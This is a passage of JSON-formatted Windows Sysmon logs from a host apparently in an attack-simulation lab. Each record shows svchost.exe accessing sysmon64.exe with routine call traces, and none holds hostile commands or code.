07:56:43.991","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4037,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.991\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.991","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4038,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.991\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.991","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4039,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.991\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.991","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4040,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.991\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.991","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4041,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.991\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.991","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4042,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.991\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.991","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4043,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.991\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.991","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4044,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.991\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 